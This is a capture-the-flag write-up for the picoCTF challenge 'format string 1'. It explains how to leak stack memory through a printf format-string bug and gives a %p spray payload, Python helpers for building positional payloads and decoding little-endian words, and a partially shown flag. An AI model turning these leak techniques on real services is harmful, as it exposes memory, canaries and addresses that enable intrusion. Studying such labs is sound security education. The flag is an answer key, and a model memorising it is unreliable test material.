format string 1

Published: April 3, 2024

Description

Patrick and Sponge Bob were really happy with those orders you made for them, but now they're curious about the secret menu. Find it, and along the way, maybe you'll find something else of interest!

Netcat + CyberChef

Download the binary/source for local testing, then connect to the remote menu with netcat.

Have CyberChef (or another hex→ASCII tool) ready to decode the leaked pointers.

wget https://artifacts.picoctf.net/c_mimas/50/vuln && \
wget https://artifacts.picoctf.net/c_mimas/50/vuln.c && \
nc mimas.picoctf.net 57322

Solution

This challenge builds on format string 0: instead of just selecting menu items, you now have to leak stack data. Once you are comfortable with stack leaks, move on to format string 2 to learn memory overwrites with pwntools. The Buffer Overflow and Binary Exploitation guide explains format string stack leaks and writes in depth.
  1. Step 1: Spray the stack
    Send a payload of repeated %p separated by commas to dump many stack words at once.
    %p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p

    The %p format specifier prints a pointer-sized argument in hexadecimal, typically prefixed with 0x. Unlike %s, which treats its argument as a string pointer and can crash when that address is invalid, %p prints the raw value without dereferencing it. That makes it the safest specifier for stack spraying.

    Separating specifiers with commas (or any printable delimiter) makes the output easy to parse: each comma-separated value corresponds to one 8-byte argument slot that printf believes it was passed. On a typical x86-64 Linux binary, the stack region reached this way holds local variables, saved registers, return addresses, and often the flag or a pointer to it if it was recently in scope.

    The number of %p specifiers determines how far you read. Each specifier consumes one argument slot (8 bytes on 64-bit). On x86-64 Linux the first five slots come from registers (rsi, rdx, rcx, r8, r9) and the rest from the stack, so 24 specifiers return 5 register values followed by 19 stack words (152 bytes). Exploit developers often use the direct parameter access syntax instead: %15$p reads the 15th argument directly, without the preceding 14 specifiers. It is cleaner but requires knowing the offset first.
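Both payload styles described above can be generated rather than typed by hand. The following is a minimal sketch; the helper names `spray_payload` and `positional_payload` are hypothetical, and the index range 14 to 18 is only an illustration, not the real offset for this binary.

```python
def spray_payload(count: int, sep: str = ",") -> str:
    """Return `count` copies of %p joined by `sep`."""
    return sep.join(["%p"] * count)


def positional_payload(indices, sep: str = ",") -> str:
    """Return %N$p specifiers for the given 1-based argument indices."""
    return sep.join(f"%{i}$p" for i in indices)


# The 24-specifier spray used in this step.
print(spray_payload(24))

# Direct parameter access; indices 14..18 are placeholders for illustration.
print(positional_payload(range(14, 19)))
```

Either string can be pasted at the netcat prompt as-is.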

    Stack spraying with format strings is the first step in many format string exploits. After mapping the stack layout, attackers locate the specific offset that holds useful addresses (like a stack canary, a return address, or the address of a buffer containing the flag) and target them precisely.
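To map the layout, it helps to number the leaked values so that each one lines up with the index you would use in %N$p. The sketch below assumes comma-separated %p output from glibc, which prints a NULL pointer as (nil). The `sample` string is illustrative, not real output from the service, and `parse_spray` is a hypothetical helper name.

```python
def parse_spray(output: str, sep: str = ","):
    """Map 1-based argument index -> leaked integer value."""
    leaked = {}
    for index, token in enumerate(output.strip().split(sep), start=1):
        token = token.strip()
        # glibc prints a NULL pointer as "(nil)" rather than 0x0.
        leaked[index] = 0 if token == "(nil)" else int(token, 16)
    return leaked


# Illustrative sample only; the real service prints different values.
sample = "0x402118,(nil),0x7b4654436f636970"

for index, value in parse_spray(sample).items():
    print(f"%{index}$p -> {value:#x}")
```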

  2. Step 2: Filter the useful words
    Among the outputs you'll see values such as 0x7b4654436f636970. These are not real pointers: each one is eight ASCII bytes of the flag read as a single 64-bit word, so the characters inside each word appear in reverse order.

    The values 0x7b4654436f636970 etc. are 8-byte (64-bit) words read directly from the stack, printed as hex. To understand why they contain flag data: when C stores a string on the stack or in a register, its bytes appear in memory in sequential order. When read as a 64-bit integer, the bytes are interpreted in little-endian order - so the last character of an 8-character chunk appears in the most significant byte and is printed first in the hex representation.

    Decoding: 0x7b4654436f636970 → bytes (big-endian display) 7b 46 54 43 6f 63 69 70 → "{FTCocip" → reversed (little-endian) → "picoCTF{". This reversal is a constant source of confusion in format string exploitation and must be accounted for when reassembling leaked data.
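The same decode can be checked in a couple of lines of Python. This is a small sketch using only the value quoted in this writeup; `int.to_bytes` with "little" emits the least significant byte first, which is the order the bytes had in memory.

```python
word = 0x7b4654436f636970

# Little-endian: least significant byte first, matching memory order.
chunk = word.to_bytes(8, "little")

print(chunk.decode("ascii"))  # picoCTF{
```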

    Flag bytes appear on the stack because the program likely stored the flag string in a local variable or passed it as a function argument at some point. Stack memory is not cleared when a value goes out of use; it persists until something overwrites it. This persistence is what makes stack leaking so powerful: data the program is "done with" may still be recoverable by an attacker who reads the stack contents.
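Picking the text-like words out of a long spray can be done with a simple heuristic: keep a word only if all of its bytes are printable ASCII. The sketch below is one possible filter, not part of the original solution. `is_text_word` is a hypothetical helper, and every value in `leaked` except 0x7b4654436f636970 is made up for illustration.

```python
def is_text_word(word: int) -> bool:
    """True if the 64-bit word decodes to non-empty printable ASCII."""
    # Trailing NULs are allowed so a short final chunk still matches.
    raw = word.to_bytes(8, "little").rstrip(b"\x00")
    return len(raw) > 0 and all(0x20 <= b <= 0x7E for b in raw)


# Illustrative values; only the third one comes from this writeup.
leaked = [0x402118, 0x0, 0x7b4654436f636970, 0x7ffd1c2b3a40]

print([hex(w) for w in leaked if is_text_word(w)])
```

Small integers that happen to fall in the printable range will pass this filter as well, so treat matches as candidates rather than confirmed flag chunks.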

  3. Step 3: Decode and reorder
    Copy the five flag words (8 bytes each) into CyberChef, then apply From Hex followed by Reverse. Reverse flips the whole input, so supply the chunks last to first; the result is picoCTF{7y13_4x4_f14g_b54n1m41_5d7...}.

    CyberChef's Reverse operation undoes the endianness swap: each 8-byte chunk sat in memory in little-endian order but was printed most-significant-byte-first, so reversing its bytes restores the original character order. Reverse acts on the entire input rather than chunk by chunk, so you can either decode each chunk on its own and concatenate the results in leak order, or reverse everything in one pass.

    The chunk reordering (last to first) is only needed for the one-pass approach: reversing the whole input also reverses the order of the chunks, so they must be supplied last to first to compensate. On the stack itself the flag occupies increasing addresses, and successive %p specifiers read increasing addresses, so the leaked words already arrive in string order. Understanding how printf's argument pointer moves relative to the stack pointer is essential for reliable exploit development.
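The two ways of handling chunk order can be compared directly. The sketch below emulates From Hex and Reverse in Python, on the assumption that Reverse flips its whole input. The `placeholder` string is a made-up stand-in and not the challenge flag; it is packed into words the same way the real flag would appear in a leak.

```python
# Hypothetical placeholder, NOT the challenge flag: 24 bytes = three words.
placeholder = b"picoCTF{example_flag!!!}"

# Simulate the leak: each 8-byte slice read as a little-endian 64-bit word.
words = [
    int.from_bytes(placeholder[i:i + 8], "little")
    for i in range(0, len(placeholder), 8)
]
# Hex digits as %p would show them, without the 0x prefix.
hex_chunks = [f"{w:016x}" for w in words]

# Workflow 1: reverse the bytes of each chunk, keep the leak order.
per_chunk = b"".join(bytes.fromhex(h)[::-1] for h in hex_chunks)

# Workflow 2: supply chunks last to first, then reverse everything once.
whole = bytes.fromhex("".join(reversed(hex_chunks)))[::-1]

assert per_chunk == whole == placeholder
print(per_chunk.decode("ascii"))
```

Both workflows give the same bytes, so the choice comes down to which is less error-prone to do by hand.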

    This manual decode-and-reorder process is what pwntools automates. The pwntools unpack() function and Python's struct module handle endianness conversions, and pwntools' format string utilities can automate the entire reconnaissance phase. Learning the manual process first builds the intuition needed to debug automated exploits when they fail.
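For scripted decoding without any third-party dependency, the standard struct module is enough. The following is a minimal sketch: `words_to_bytes` is a hypothetical helper, and the only input shown is the one word quoted in this writeup. With pwntools installed, p64() applied to each word should give the same bytes under its default little-endian setting, though that is not exercised here.

```python
import struct


def words_to_bytes(words):
    """Pack leaked 64-bit words little-endian and strip trailing NUL padding."""
    return struct.pack(f"<{len(words)}Q", *words).rstrip(b"\x00")


print(words_to_bytes([0x7b4654436f636970]))  # b'picoCTF{'
```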

    In real-world attacks, leaked stack data can reveal: ASLR bypass addresses (defeating Address Space Layout Randomization), stack canary values (bypassing stack smashing protection), and return addresses (for ROP chain construction). Format string vulnerabilities that leak stack data are therefore extremely high-severity even if they don't directly allow arbitrary write.

Flag

picoCTF{7y13_4x4_f14g_b54n1m41_5d7...}
